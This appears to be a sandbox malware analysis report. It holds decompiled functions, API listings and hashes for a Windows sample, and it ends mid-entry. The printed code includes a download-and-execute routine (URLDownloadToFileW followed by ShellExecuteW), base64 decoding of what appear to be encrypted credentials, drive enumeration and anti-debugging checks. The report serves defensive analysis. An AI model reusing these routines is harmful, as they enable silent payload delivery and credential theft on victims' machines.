                                                                    • Instruction ID: fbdb54472394a0ffd655464894079858720b187d24485f753ff28fe57ac8578a
                                                                    • Opcode Fuzzy Hash: f6714edca229872afa110b3b18dd54a3f3456612d63dd0265e9a4b51b924e2d9
                                                                    • Instruction Fuzzy Hash: D511C672D01669ABC721CBA8D9809AEF7BCEF58704B114566D956E3301E7319E05CBB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AB0C
                                                                    • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040AB24
                                                                    • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 0040AB7A
                                                                    • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 0040AB8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$AllocInfoProtectQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 3562403962-0
                                                                    • Opcode ID: 0134596d88bd9379e937d24a595022f0e1472751ad23ccb639c4b92f600b1ab5
                                                                    • Instruction ID: b8fe15ab3f8e7473abd2c09fcd97057fc673d9731f333d2d124805e491acea3b
                                                                    • Opcode Fuzzy Hash: 0134596d88bd9379e937d24a595022f0e1472751ad23ccb639c4b92f600b1ab5
                                                                    • Instruction Fuzzy Hash: B321A872E40219ABCF20DFA5CC85AEFB7B9EB44754F01007AEA05F7180EB34A904C7A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407DCB
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00407E97
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407EB7
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00407EC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 6c0b653815d37ff36d20c72271f8328257ee6dcda395897a9847d5dfb99108c1
                                                                    • Instruction ID: ce3531b34b27b70b50f1634ac06ac852a7cffe9a67bf8a2d50cf32989af2b1f6
                                                                    • Opcode Fuzzy Hash: 6c0b653815d37ff36d20c72271f8328257ee6dcda395897a9847d5dfb99108c1
                                                                    • Instruction Fuzzy Hash: 6D311875D4521C9BDB10DFA4D9897CDBBB8AF08304F1081EAE50CAB290EB749A85CF49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1F56D(void* __ecx, void* __eflags) {
                                                                    				void* _v8;
                                                                    				short _v12;
                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                    				long _v20;
                                                                    				long _v24;
                                                                    				union _SID_NAME_USE _v28;
                                                                    				short _v60;
                                                                    				short _v580;
                                                                    				void* _t37;
                                                                    
                                                                    				_v20 = 0x10;
                                                                    				_v8 = 0;
                                                                    				_t37 = __ecx;
                                                                    				// _v16 and _v12 overlap on the stack: the six authority bytes become {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY
                                                                    				_v16.Value = 0;
                                                                    				_v12 = 0x500;
                                                                    				E02D11052( &_v580, 0, 0x208);
                                                                    				_v24 = 0x104;
                                                                    				// Sub-authorities 0x20 and 0x220 give S-1-5-32-544 (BUILTIN\Administrators); LookupAccountSidW resolves its localized name into _v580
                                                                    				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
                                                                    					GetLastError();
                                                                    				}
                                                                    				if(_v8 != 0) {
                                                                    					FreeSid(_v8);
                                                                    				}
                                                                    				// The resolved group name is stored into the caller's object (_t37)
                                                                    				E02D135E5(_t37,  &_v580);
                                                                    				return _t37;
                                                                    			}
                                                                    0x02d1f57a
                                                                    0x02d1f58c
                                                                    0x02d1f591
                                                                    0x02d1f593
                                                                    0x02d1f596
                                                                    0x02d1f59c
                                                                    0x02d1f5a4
                                                                    0x02d1f5ca
                                                                    0x02d1f5f1
                                                                    0x02d1f5f1
                                                                    0x02d1f5fa
                                                                    0x02d1f5ff
                                                                    0x02d1f5ff
                                                                    0x02d1f60e
                                                                    0x02d1f618

                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,02D1D471,?,?,00000001), ref: 02D1F5C2
                                                                    • LookupAccountSidW.ADVAPI32(00000000,02D1D471,?,00000104,?,00000010,?), ref: 02D1F5E7
                                                                    • GetLastError.KERNEL32(?,?,00000001), ref: 02D1F5F1
                                                                    • FreeSid.ADVAPI32(02D1D471,?,?,00000001), ref: 02D1F5FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                                                    • String ID:
                                                                    • API String ID: 1866703397-0
                                                                    • Opcode ID: 2e6b11613bc10c16358b7cc6fdf5ac1af1ff994601aa3292f33a340334703650
                                                                    • Instruction ID: 7d9dd636546a47f30580401e66126bd5cbe0b5f6c56b79e05ad48dd48f3f992a
                                                                    • Opcode Fuzzy Hash: 2e6b11613bc10c16358b7cc6fdf5ac1af1ff994601aa3292f33a340334703650
                                                                    • Instruction Fuzzy Hash: 7E11FBB1D0020DBBDB10DFD1E989AEEB7BCEB04304F100466E605E2240E7709E488BA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E02D1CC54(intOrPtr __ecx, void** __edx, long* _a4) {
                                                                    				intOrPtr _v8;
                                                                    				void* _t6;
                                                                    				void* _t8;
                                                                    				long* _t9;
                                                                    				void* _t13;
                                                                    				void** _t14;
                                                                    				void* _t16;
                                                                    				void* _t17;
                                                                    
                                                                    				_t9 = _a4;
                                                                    				_t17 = 0;
                                                                    				_v8 = __ecx;
                                                                    				_t14 = __edx;
                                                                    				 *_t9 = 0;
                                                                    				 *((intOrPtr*)(__edx)) = 0;
                                                                    				// dwFlags = 1 (CRYPT_STRING_BASE64): first call only computes the decoded size into *_a4
                                                                    				// (decompiled at 37% quality; the condition below presumably tests the call's return value)
                                                                    				__imp__CryptStringToBinaryW(__ecx, 0, 1, 0, _t9, 0, 0, _t13, _t16, _t8, __ecx);
                                                                    				if(__ecx != 0) {
                                                                    					_t6 = LocalAlloc(0x40,  *_t9);
                                                                    					 *_t14 = _t6;
                                                                    					if(_t6 != 0) {
                                                                    						// Second call base64-decodes the string into the freshly allocated buffer
                                                                    						__imp__CryptStringToBinaryW(_v8, 0, 1, _t6, _t9, 0, 0);
                                                                    						_t17 = _t6;
                                                                    						if(_t17 == 0) {
                                                                    							 *_t14 = LocalFree( *_t14);
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t17;
                                                                    			}

                                                                    0x02d1cc59
                                                                    0x02d1cc60
                                                                    0x02d1cc62
                                                                    0x02d1cc6b
                                                                    0x02d1cc6d
                                                                    0x02d1cc71
                                                                    0x02d1cc73
                                                                    0x02d1cc7b
                                                                    0x02d1cc81
                                                                    0x02d1cc87
                                                                    0x02d1cc8b
                                                                    0x02d1cc97
                                                                    0x02d1cc9d
                                                                    0x02d1cca1
                                                                    0x02d1ccab
                                                                    0x02d1ccab
                                                                    0x02d1cca1
                                                                    0x02d1cc8b
                                                                    0x02d1ccb3

                                                                    APIs
                                                                    • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC73
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CC81
                                                                    • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC97
                                                                    • LocalFree.KERNEL32(?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CCA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 4291131564-0
                                                                    • Opcode ID: 1b08b8e97dc689faa290b21b36e27f8507ec2119ec2a44eacc9ea7b3179746f8
                                                                    • Instruction ID: 7d83f06d506d4b945de60dee2a9c62ad3d3b970667df5064fb7607d7b3ea8f60
                                                                    • Opcode Fuzzy Hash: 1b08b8e97dc689faa290b21b36e27f8507ec2119ec2a44eacc9ea7b3179746f8
                                                                    • Instruction Fuzzy Hash: 0401F671641222BFEB314B5ADD49E97BFADEF197A1B110421F908D6350E7718C10CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E02D127D3(void* __ecx, void* __eflags, signed int _a4) {
                                                                    				short* _v12;
                                                                    				void* _v16;
                                                                    				char _v20;
                                                                    				void* _t26;
                                                                    				void* _t36;
                                                                    				void* _t38;
                                                                    				void* _t42;
                                                                    				void* _t58;
                                                                    				void* _t59;
                                                                    
                                                                    				_t66 = __eflags;
                                                                    				_t42 = __ecx;
                                                                    				_t58 = 0x1a;
                                                                    				// Builds the target path: special folder 0x1a (see SHGetSpecialFolderPathW subcall) + "\\" + a name derived from the URL in _a4
                                                                    				E02D1F76B( &_v12, _t58, __eflags);
                                                                    				_t59 = 0xa;
                                                                    				_t26 = E02D134A7( &_v16, _t59, __eflags);
                                                                    				E02D13335(E02D1346A( &_v12, _t59, _t66, "\\"), _t66, _t26);
                                                                    				E02D15EA5(_v16);
                                                                    				_t61 = _a4 + 4;
                                                                    				E02D1362D( &_v16, _a4 + 4);
                                                                    				E02D13335( &_v12, _t66, E02D1351D( &_v16,  &_a4));
                                                                    				E02D15EA5(_a4);
                                                                    				_a4 = _a4 & 0x00000000;
                                                                    				E02D15EA5(_v16);
                                                                    				_t36 = E02D1362D( &_a4, _t61);
                                                                    				// Download-and-execute: fetch the URL to the built path, then open it if the download returned S_OK (0)
                                                                    				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
                                                                    				E02D15EA5(_a4);
                                                                    				if(_t36 == 0) {
                                                                    					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
                                                                    					// ShellExecuteW reports success with a value greater than 32
                                                                    					_v16 = 2;
                                                                    					__eflags = _t38 - 0x20;
                                                                    					if(_t38 > 0x20) {
                                                                    						_v16 = 0;
                                                                    					}
                                                                    				} else {
                                                                    					_v16 = 1;
                                                                    				}
                                                                    				// Status code (0 = ran, 1 = download failed, 2 = execute failed) is reported through E02D14F2B
                                                                    				_v20 = 0x2d247d8;
                                                                    				E02D14F2B(_t42,  &_v20);
                                                                    				return E02D15EA5(_v12);
                                                                    			}
                                                                    0x02d127d3
                                                                    0x02d127dc
                                                                    0x02d127e3
                                                                    0x02d127e4
                                                                    0x02d127eb
                                                                    0x02d127ef
                                                                    0x02d12806
                                                                    0x02d1280e
                                                                    0x02d12819
                                                                    0x02d1281d
                                                                    0x02d12832
                                                                    0x02d1283a
                                                                    0x02d12842
                                                                    0x02d12846
                                                                    0x02d12852
                                                                    0x02d12860
                                                                    0x02d1286b
                                                                    0x02d12872
                                                                    0x02d1288a
                                                                    0x02d12890
                                                                    0x02d12897
                                                                    0x02d1289a
                                                                    0x02d1289c
                                                                    0x02d1289c
                                                                    0x02d12874
                                                                    0x02d12874
                                                                    0x02d12874
                                                                    0x02d128a2
                                                                    0x02d128ac
                                                                    0x02d128bd

                                                                    APIs
                                                                      • Part of subcall function 02D1F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,00000000,?), ref: 02D1F79C
                                                                      • Part of subcall function 02D13335: lstrcatW.KERNEL32(00000000,745D0770), ref: 02D13365
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D1351D: PathFindExtensionW.SHLWAPI(?,?,02D1282E,?,?,00000000,02D24684), ref: 02D13527
                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 02D12860
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 02D1288A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                                                    • String ID: open
                                                                    • API String ID: 4166385161-2758837156
                                                                    • Opcode ID: 5eef882425b1bfacfdd930e768d8035ad62a242c773a149bfd299ee58fc11c6a
                                                                    • Instruction ID: c833151196680b954ddabf25458c87f14d86a51650e5b9836186da3b67d99e0d
                                                                    • Opcode Fuzzy Hash: 5eef882425b1bfacfdd930e768d8035ad62a242c773a149bfd299ee58fc11c6a
                                                                    • Instruction Fuzzy Hash: DF215C71D00218BBDB14AFA1E884DEE7B7AEFD1714F018099E81667780DB345E49CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 0040735F: GetLastError.KERNEL32 ref: 00407371
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0040118D), ref: 0040729C
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040118D), ref: 004072AB
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004072A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 389471666-631824599
                                                                    • Opcode ID: a767473c31afe462ed5c59052da0bbfae9cde02be0223a21480e5810e46b0c85
                                                                    • Instruction ID: 552a288e0f0e51fb3f1ce2b7436c22c16934ba3ff4c49672663a84e09985d18d
                                                                    • Opcode Fuzzy Hash: a767473c31afe462ed5c59052da0bbfae9cde02be0223a21480e5810e46b0c85
                                                                    • Instruction Fuzzy Hash: 71E09B706047118FD3609F35E8447827AE4AF04344F00C87FE849D2780DBB8E448CBBA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E02D2002B(intOrPtr __ecx, void* __eflags) {
                                                                    				void* _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				int _v20;
                                                                    				WCHAR* _v24;
                                                                    				intOrPtr _v28;
                                                                    				signed int _v32;
                                                                    				intOrPtr _v36;
                                                                    				char _v40;
                                                                    				WCHAR* _t33;
                                                                    				intOrPtr _t34;
                                                                    				int _t44;
                                                                    				WCHAR* _t54;
                                                                    				signed int _t72;
                                                                    				intOrPtr _t74;
                                                                    				int _t75;
                                                                    				long _t76;
                                                                    				WCHAR* _t77;
                                                                    				void* _t78;
                                                                    				void* _t79;
                                                                    
                                                                    				_t74 = __ecx;
                                                                    				_v12 = __ecx;
                                                                    				_t33 = E02D15F53(0x208);
                                                                    				_v32 = _v32 & 0x00000000;
                                                                    				_t54 = _t33;
                                                                    				_t34 = 5;
                                                                    				_v28 = _t34;
                                                                    				_v36 = _t34;
                                                                    				E02D119F6( &_v40, __eflags);
                                                                    				// Drive enumeration: GetLogicalDriveStringsW fills a double-NUL-terminated list of drive roots ("C:\", ...)
                                                                    				_t76 = GetLogicalDriveStringsW(0x104, _t54);
                                                                    				_t81 = _t76 - 0x104;
                                                                    				if(_t76 > 0x104) {
                                                                    					// Buffer too small: the return value is the required length in characters, so reallocate and retry
                                                                    					_t72 = 2;
                                                                    					_t54 = E02D15F53( ~(0 | _t81 > 0x00000000) | _t36 * _t72);
                                                                    					GetLogicalDriveStringsW(_t76, _t54);
                                                                    				}
                                                                    				_t77 = 0;
                                                                    				if( *_t54 != 0) {
                                                                    					do {
                                                                    						_v24 = _t77;
                                                                    						E02D13437( &_v24, E02D135E5( &_v8, _t54));
                                                                    						E02D15EA5(_v8);
                                                                    						_v8 = _t77;
                                                                    						// Each root is paired with its GetDriveTypeW result and appended to the list in _v40
                                                                    						_t44 = GetDriveTypeW(_v24);
                                                                    						_t79 = _t79 - 0xc;
                                                                    						_t75 = _t44;
                                                                    						_t78 = _t79;
                                                                    						_v20 = _t75;
                                                                    						E02D1362D(_t78,  &_v24);
                                                                    						 *(_t78 + 4) = _t75;
                                                                    						 *((intOrPtr*)(_t78 + 8)) = _v16;
                                                                    						E02D11903( &_v40);
                                                                    						// Advance past the current root string and its terminating NUL
                                                                    						_t54 =  &(( &(_t54[E02D13261( &_v24)]))[1]);
                                                                    						E02D15EA5(_v24);
                                                                    						_t77 = 0;
                                                                    						_v24 = 0;
                                                                    						_t84 =  *_t54;
                                                                    					} while ( *_t54 != 0);
                                                                    					_t74 = _v12;
                                                                    				}
                                                                    				E02D113A8(_t74, _t84,  &_v40);
                                                                    				_t60 = _v40;
                                                                    				if(_v40 != 0) {
                                                                    					E02D11B00(_t60, _t60);
                                                                    				}
                                                                    				return _t74;
                                                                    			}
                                                                    0x02d20034
                                                                    0x02d2003b
                                                                    0x02d2003e
                                                                    0x02d20043
                                                                    0x02d2004c
                                                                    0x02d2004e
                                                                    0x02d2004f
                                                                    0x02d20052
                                                                    0x02d20055
                                                                    0x02d20066
                                                                    0x02d20068
                                                                    0x02d2006e
                                                                    0x02d20074
                                                                    0x02d20083
                                                                    0x02d20087
                                                                    0x02d20087
                                                                    0x02d2008d
                                                                    0x02d20092
                                                                    0x02d20094
                                                                    0x02d20098
                                                                    0x02d200a4
                                                                    0x02d200ac
                                                                    0x02d200b4
                                                                    0x02d200b7
                                                                    0x02d200bd
                                                                    0x02d200c0
                                                                    0x02d200c2
                                                                    0x02d200c4
                                                                    0x02d200cd
                                                                    0x02d200d8
                                                                    0x02d200db
                                                                    0x02d200de
                                                                    0x02d200f1
                                                                    0x02d200f4
                                                                    0x02d200f9
                                                                    0x02d200fb
                                                                    0x02d200fe
                                                                    0x02d200fe
                                                                    0x02d20103
                                                                    0x02d20103
                                                                    0x02d2010c
                                                                    0x02d20111
                                                                    0x02d20116
                                                                    0x02d20119
                                                                    0x02d20119
                                                                    0x02d20124

                                                                    APIs
                                                                      • Part of subcall function 02D15F53: GetProcessHeap.KERNEL32(00000000,000000F4,02D20477,?,745D0770,00000000,02D15A34), ref: 02D15F56
                                                                      • Part of subcall function 02D15F53: HeapAlloc.KERNEL32(00000000), ref: 02D15F5D
                                                                    • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 02D20060
                                                                    • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 02D20087
                                                                    • GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 02D200B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Drive$HeapLogicalStrings$AllocProcessType
                                                                    • String ID:
                                                                    • API String ID: 2408535517-0
                                                                    • Opcode ID: 8308d737643fe2d3500817843970e65ce50674f473c6e71e3ecfc16b0b12823b
                                                                    • Instruction ID: 7dd6ea1d60364e9e3c861e9356440bedefc2bc545e76c98c19ef30f75a23a694
                                                                    • Opcode Fuzzy Hash: 8308d737643fe2d3500817843970e65ce50674f473c6e71e3ecfc16b0b12823b
                                                                    • Instruction Fuzzy Hash: D0318F71E00229ABCF15EBE4E5859AFB7B9EF94345F10406AD502B7380EB745E04CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040A89B
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040A8A5
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040A8B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: acbb04395daa44992181811b2a2a5e27bab9f0f7b1aa0a99f232378e9ca52403
                                                                    • Instruction ID: 97881ca7debea6894f4bf05f1ab527d76a61141538de8bfb4ec4395a06f1f77d
                                                                    • Opcode Fuzzy Hash: acbb04395daa44992181811b2a2a5e27bab9f0f7b1aa0a99f232378e9ca52403
                                                                    • Instruction Fuzzy Hash: 2931D775D51318ABCB21DF64D8887DDBBB4AF18310F5081EAE80CA7291EB349F958F49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			/* Base64-decodes the string _a4 (CryptStringToBinaryA flag 1 = CRYPT_STRING_BASE64)
                                                                    			   into a stack buffer, hands the resulting blob to the function pointer stored at
                                                                    			   this+0x70, NUL-terminates the output, and returns a heap copy of it via *_a8. */
                                                                    			E02D1B15E(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
                                                                    				int _v8;
                                                                    				DWORD* _v12;
                                                                    				DWORD* _v16;
                                                                    				void* _v20;
                                                                    				int _v24;
                                                                    				BYTE* _v28;
                                                                    				char _v32;
                                                                    				char _v8128;
                                                                    				int _t27;
                                                                    				CHAR* _t39;
                                                                    				void* _t43;
                                                                    
                                                                    				_t43 = __ecx;
                                                                    				E02D11190(0x1fbc, __ecx);
                                                                    				_v8 = 0x1fa0;                                   /* size of the decode buffer */
                                                                    				_t27 = lstrlenA(_a4);
                                                                    				E02D11052( &_v8128, 0, 0x1fa0);                  /* zero the decode buffer */
                                                                    				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);
                                                                    				_v32 = 0;
                                                                    				_v28 =  &_v8128;                                /* input blob: data pointer */
                                                                    				_v24 = _v8;                                     /* input blob: decoded length */
                                                                    				_v16 = 0;
                                                                    				_v12 = 0;
                                                                    				_v20 = 0;
                                                                    				 *((intOrPtr*)(_t43 + 0x70))( &_v32,  &_v20, 0); /* indirect call through object vtable/field at +0x70 */
                                                                    				 *((char*)(_v12 + _v16)) = 0;                    /* NUL-terminate output (_v16 = data, _v12 = length) */
                                                                    				_t39 = E02D15EB4(_v12 + 1);                      /* VirtualAlloc-backed allocation (see subcall) */
                                                                    				 *_a8 = _t39;
                                                                    				return lstrcpyA(_t39, _v16);
                                                                    			}

                                                                    0x02d1b15e
                                                                    0x02d1b166
                                                                    0x02d1b178
                                                                    0x02d1b17b
                                                                    0x02d1b18e
                                                                    0x02d1b1a9
                                                                    0x02d1b1b5
                                                                    0x02d1b1b8
                                                                    0x02d1b1be
                                                                    0x02d1b1c9
                                                                    0x02d1b1cd
                                                                    0x02d1b1d0
                                                                    0x02d1b1d3
                                                                    0x02d1b1df
                                                                    0x02d1b1e8
                                                                    0x02d1b1f4
                                                                    0x02d1b200

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(?,?,?,00000000,?,02D1AA4B,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 02D1B17B
